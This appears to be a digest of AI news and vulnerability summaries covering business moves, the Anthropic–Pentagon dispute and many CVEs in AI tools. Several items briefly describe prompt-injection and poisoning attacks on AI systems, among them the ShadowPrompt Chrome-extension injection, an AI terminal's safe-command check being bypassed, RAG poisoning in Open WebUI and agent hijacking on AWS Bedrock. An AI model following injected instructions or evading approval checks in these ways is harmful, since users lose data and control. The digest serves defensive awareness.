OpenAI Shuts Down Sora Video App Over Profitability Concerns: OpenAI discontinued its Sora video-generation app and canceled a $1 billion Disney partnership because the service consumed too many computational resources without generating enough revenue to justify costs as the company prioritizes profitability.
Critical Injection Vulnerability in localGPT LLM Tool: CVE-2026-5002 allows remote injection attacks (inserting malicious code into input) through the LLM Prompt Handler in PromtEngineer localGPT's backend. The exploit code is publicly available, and the vendor has not responded to disclosure attempts.
Political Deepfakes Gain Influence Despite Public Awareness: AI researchers found that creators use generative AI (technology that creates images or videos from text descriptions) to produce fake media of political figures for propaganda and profit, and these deepfakes shape public perception even when viewers know the content is fake.
TikTok's AI Ad Labels Failing in Practice: Major companies like Samsung are posting AI-generated ads on TikTok without the required disclosure labels, preventing users from identifying whether advertisements were created by AI or humans despite platform policies requiring transparency.
Critical Langflow RCE Exploited Within Hours of Disclosure: Attackers exploited a critical vulnerability (CVE-2026-33017) in Langflow, an open-source AI pipeline builder, within hours of public disclosure, allowing them to run arbitrary code on unprotected systems through an exposed API endpoint that executes malicious Python without authentication. CISA added it to its Known Exploited Vulnerabilities catalog and set an April 8, 2026 patch deadline for federal agencies.
LangChain and LangGraph Vulnerabilities Expose Secrets in Widely Used AI Frameworks: Three high-severity vulnerabilities were discovered in LangChain and LangGraph, affecting millions of weekly downloads, that could expose sensitive files through path traversal (manipulating file paths to access restricted files), leak API keys through deserialization flaws, and allow database manipulation via SQL injection (inserting malicious database commands).
CISA Warns of Active Langflow Exploitation: CISA reports that hackers are actively exploiting CVE-2026-33017, a critical vulnerability (rated 9.3 out of 10) in Langflow, an open-source framework for building AI workflows. This code injection flaw allows attackers to execute arbitrary Python code and gain RCE (remote code execution, where an attacker can run commands on a system they don't own) on unpatched systems running version 1.8.1 or earlier, with exploitation beginning just 20 hours after the vulnerability details were made public.
Critical RCE in n8n Workflow Automation: A prototype pollution vulnerability (a type of attack that modifies how objects are created in JavaScript) in n8n's GSuiteAdmin node allows authenticated users to execute arbitrary code on the n8n server by crafting malicious workflow parameters (CVE-2026-33696). An attacker with permission to create or modify workflows could exploit this to gain control over the entire n8n instance.
Malicious LiteLLM Versions Steal Developer Credentials: Two versions of LiteLLM (1.82.7 and 1.82.8), a widely-used Python library for working with AI models, were published with malware that steals credentials including usernames, passwords, and authentication tokens. This supply chain attack (where attackers compromise widely-used software) was part of a larger campaign called TeamPCP that also targeted other developer security tools, and the malicious code harvested sensitive data like API keys, cloud credentials, and SSH keys (private authentication files) before being removed after about two hours.
OpenAI Shuts Down Sora Video App After Six Months: OpenAI closed its Sora AI video-generation app (software that creates realistic videos from text descriptions) less than two years after launch to focus on other priorities like robotics and autonomous AI agents. The shutdown ends a recent partnership with Disney, which had licensed its intellectual property (creative works and characters) to Sora in a landmark deal and will now seek other AI platform partners.
Anthropic Launches Computer Control for Claude: Anthropic released a feature allowing Claude to autonomously control a user's computer, opening apps, browsing the web, and filling spreadsheets, though the company warns the capability is still early and prone to mistakes. The feature is available as a research preview for Claude Pro and Max subscribers on macOS and requires user permission before accessing new applications.
Anthropic Seeks Injunction Against Pentagon Ban: Anthropic is asking a federal judge to temporarily block the Pentagon's designation of Claude AI as a supply chain risk (a classification meaning the technology threatens U.S. national security), arguing the ban is retaliation for refusing to allow Claude's use in autonomous weapons or mass surveillance. The company says it could lose billions in business without court intervention.
AWS Bedrock Exposes Eight Major Attack Vectors: Researchers found eight ways attackers can exploit AWS Bedrock (Amazon's platform for connecting AI models to enterprise data), including log manipulation to hide their tracks, knowledge base compromise to steal company data, agent hijacking (taking control of autonomous AI software), and prompt poisoning (corrupting AI instructions).
Senator Questions Pentagon's Anthropic Blacklist as Potential Retaliation: Senator Elizabeth Warren is challenging the Department of Defense's decision to label AI company Anthropic as a "supply chain risk," suggesting it may be retaliation after Anthropic refused to allow use of its AI models for fully autonomous weapons or domestic mass surveillance. Anthropic has filed a lawsuit against the Trump administration over the blacklist.
Spotify Bets AI Discovery Tools Will Keep Subscribers Loyal: Spotify is rolling out ChatGPT-powered playlist features that let users describe music they want through conversation instead of traditional search, with 90 million subscribers already using their AI DJ feature. Executives say these AI tools are critical for retention as music catalogs become nearly identical across competing streaming platforms.
Elon Musk Announces Terafab Chip Plant for AI and Robotics: Musk plans to build a massive chip manufacturing facility in Austin, Texas, jointly run by Tesla and SpaceX to produce processors for AI, robotics, and space applications. The move reflects industry concerns that current chip makers cannot scale production fast enough to meet surging AI demand, though building such plants requires billions of dollars and many years.
Google Launches On-Device AI Agent That Controls Your Apps: Gemini task automation is now in beta on select phones, allowing AI to actually operate apps like food delivery services instead of just answering questions. It's slow and works with limited services, but marks a shift toward AI agents that take actions on your behalf.
Open-Source AI Agents Run Locally, Threatening Cloud Dominance: OpenClaw, an open-source project, lets developers build and run AI agents on personal computers instead of relying on expensive cloud services from major companies. The rapid adoption suggests advanced AI capabilities are becoming commodities available to anyone, not just through proprietary platforms.
Meta AI Agent Causes Massive Internal Data Leak: A Meta employee asked an internal AI agent for help with an engineering problem, and the AI's suggested solution accidentally exposed a large amount of sensitive user and company data to engineers for two hours, demonstrating how AI systems can inadvertently guide users toward actions that create serious security problems.
Trump Administration Pushes Federal AI Rules to Block State Regulations: The Trump administration released a national AI policy framework that aims to create uniform federal safety rules while preventing states from making their own AI laws, covering areas like child safety online, data center standards, and intellectual property rights.
OpenAI Acquires Python Tooling Startup Astral: OpenAI is buying Astral, the company behind popular Python development tools (uv, ruff, and ty), to strengthen its Codex AI coding assistant, which now has over 2 million weekly active users. OpenAI says it will keep these tools open source and integrate them with Codex.
Anthropic Banned from Pentagon as Supply Chain Risk: The Trump administration has ordered government contractors to remove Anthropic's AI technology from Pentagon systems within 180 days, but most organizations lack visibility into where AI is embedded across their networks, making it extremely difficult to identify and remove the technology from applications, APIs, and third-party services.
Prompt Injection Bypasses Safety Checks in AI Code Terminal Execution: AI Code's automatic terminal command execution feature can be tricked through prompt injection (hiding malicious instructions in AI input) to run dangerous commands without user approval, even when set to only execute "safe" commands (CVE-2026-30304).
RAG Poisoning Vulnerability in Open WebUI File Processing: Open WebUI's file batch processing endpoint lacks ownership verification, allowing any authenticated user to overwrite files in shared knowledge bases and poison the RAG system (retrieval-augmented generation, where AI pulls external documents to answer questions), causing the AI to serve attacker-controlled content to other users (CVE-2026-28788).
OpenAI Launches Bug Bounty Program for AI Safety Issues: OpenAI has started a bug bounty program (a system rewarding security researchers for finding problems) focused specifically on design or implementation flaws that could enable serious harm through AI misuse or safety failures.
Claude Chrome Extension Allowed Zero-Click Prompt Injection: A vulnerability called ShadowPrompt in Anthropic's Claude Chrome extension allowed attackers to inject malicious prompts (hidden instructions) into the AI without user interaction by exploiting an overly permissive allowlist and an XSS vulnerability (a security flaw allowing attackers to run malicious code) in a CAPTCHA component. This zero-click attack could let attackers steal sensitive data, read conversation history, or perform actions like sending emails on behalf of the victim.
Federal Judge Blocks Trump Administration's Anthropic Ban: A federal judge granted Anthropic a preliminary injunction blocking the Trump administration's ban on federal agencies using Claude AI models and its Pentagon blacklisting as a supply chain risk (a designation claiming use of a company's technology threatens national security). The judge ruled the administration's actions constituted First Amendment retaliation for Anthropic publicly disagreeing with the government's contracting decisions.
Multiple Critical RCE Vulnerabilities in Workflow and Instrumentation Tools: n8n workflow automation has multiple critical flaws including remote code execution (where an attacker can run commands on a system they don't own) in its Merge node SQL mode due to improper AlaSQL sandbox restrictions (CVE-2026-33660), and OpenTelemetry Java instrumentation before version 2.26.1 allows RCE through unsafe deserialization in RMI endpoints (CVE-2026-33701). Both vulnerabilities allow authenticated or network-accessible attackers to execute arbitrary code on affected systems.
AI Agents Break Traditional Security Kill Chains: In September 2025, Anthropic revealed a state-sponsored attacker used an AI coding agent to autonomously conduct cyber espionage against 30 targets, with the AI handling 80-90% of operations itself. Compromised AI agents bypass traditional detection because they already have legitimate access and permissions, making their malicious activity look identical to normal behavior that existing security tools cannot easily distinguish.
Critical Shell Injection in Langflow CI/CD Workflows: Langflow versions before 1.9.0 contain a shell injection vulnerability where unsanitized GitHub context variables (like branch names and pull request titles) are inserted directly into shell commands, allowing attackers to execute arbitrary commands and steal secrets like GITHUB_TOKEN by creating a malicious branch or pull request during CI/CD (the automated testing and deployment process) execution. (CVE-2026-33475, Critical)
Critical Deserialization Flaw in NVIDIA APEX: NVIDIA APEX for Linux has a vulnerability where attackers can deserialize untrusted data (process data from untrusted sources, potentially running malicious code hidden in that data), affecting PyTorch versions earlier than 2.6 and potentially allowing code execution, denial of service (making a system unavailable), privilege escalation (gaining higher access levels), data tampering, and information disclosure. (CVE-2025-33244, Critical)
Multiple High-Severity Vulnerabilities in NVIDIA AI Infrastructure: NVIDIA disclosed several high-severity vulnerabilities across its AI product line, including unsafe deserialization in Model Optimizer's ONNX quantization feature (CVE-2026-24141), race conditions causing denial of service in Triton Inference Server (CVE-2025-33254, CVE-2025-33238), and a memory allocation flaw allowing DoS attacks via compressed payloads (CVE-2026-24158). All vulnerabilities could allow attackers to execute code, gain higher privileges, or make services unavailable to legitimate users.
IDOR Flaw in New API Exposed Other Users' Videos: CVE-2026-30886 is an IDOR vulnerability (insecure direct object reference, a flaw where the system doesn't check if a user owns the data they're requesting) in New API, an LLM gateway, that allowed any logged-in user to view videos belonging to other users before version 0.11.4-alpha.2. The bug occurred because the system checked only the video ID without verifying ownership.
Multiple Vendors Launch AI Agent Security Platforms: CrowdStrike, Wiz, and Varonis have each released new security products specifically designed to protect AI agents (software that can act independently with system access) and detect shadow AI (unauthorized AI tools), addressing risks like indirect prompt injection (tricking an AI by hiding malicious instructions in its input) and agentic tool chain attacks.
Unsafe Deserialization Bug in PyTorch 2.10.0: CVE-2026-4538 affects PyTorch 2.10.0's pt2 Loading Handler, allowing unsafe deserialization (loading data in a way that can execute unintended code) through a publicly available local exploit. The PyTorch team has not yet responded to the initial vulnerability report (medium severity).
FBI Director Reveals Mass Surveillance via Data Brokers: Authorities can conduct large-scale surveillance of Americans by purchasing data directly from private companies, bypassing the need for cooperation from AI firms like Anthropic (which refused to provide its technology for this purpose). This shows mass monitoring doesn't require AI tools when commercial data is readily available.
Critical SQL Injection in SQLBot Allows Full System Takeover: SQLBot (an AI-powered database query system) versions before 1.7.0 have a critical SQL injection vulnerability (CVE-2026-32950) where attackers can upload specially crafted Excel files with malicious sheet names to execute arbitrary code and gain complete control of the backend server, because the system doesn't properly sanitize (clean/validate) inputs before inserting them into database commands.
Multiple High-Severity Vulnerabilities Hit AI Platforms: FastGPT has a critical GitHub workflow flaw (CVE-2026-33075) letting attackers steal secrets and compromise production systems, while Langflow suffers from unauthorized image downloads (CVE-2026-33484) and a path traversal bug (CVE-2026-33497) that exposes secret keys used for authentication, allowing attackers to forge login tokens.
Microsoft Releases CTI-REALM Benchmark for AI Security Analysts: Microsoft open-sourced CTI-REALM, a benchmark that tests whether AI agents can actually perform real security analyst work by reading threat reports, exploring system data, and writing working detection rules (queries that catch attacks), rather than just answering trivia questions about cybersecurity.
Critical RCE in Langflow via File Upload Bypass: Langflow's file upload API is vulnerable to arbitrary file write (saving files anywhere on a server) because it doesn't validate filenames, allowing logged-in attackers to use directory traversal characters like "../" to write files outside intended directories and achieve RCE (remote code execution, where attackers can run commands on the server). (CVE-2026-33309, Critical)
Multiple Command Injection Flaws in Microsoft Copilot Products: Microsoft 365 Copilot has disclosed several vulnerabilities, including an SSRF flaw (server-side request forgery, where an attacker tricks a server into making unwanted network requests) that lets authorized attackers elevate privileges (CVE-2026-26137, High), and command injection bugs (where attackers insert malicious commands by exploiting improper input filtering) allowing unauthorized information disclosure (CVE-2026-24299, CVE-2026-26136).
Prompt Injection Leads to XSS in Discourse AI Features: Discourse's AI-powered moderation system trusted output directly from language models without sanitization (cleaning), allowing attackers to use prompt injection (tricking the AI by hiding instructions in user input) to generate malicious code that executes in staff members' browsers when reviewing flagged posts. (CVE-2026-27740, High)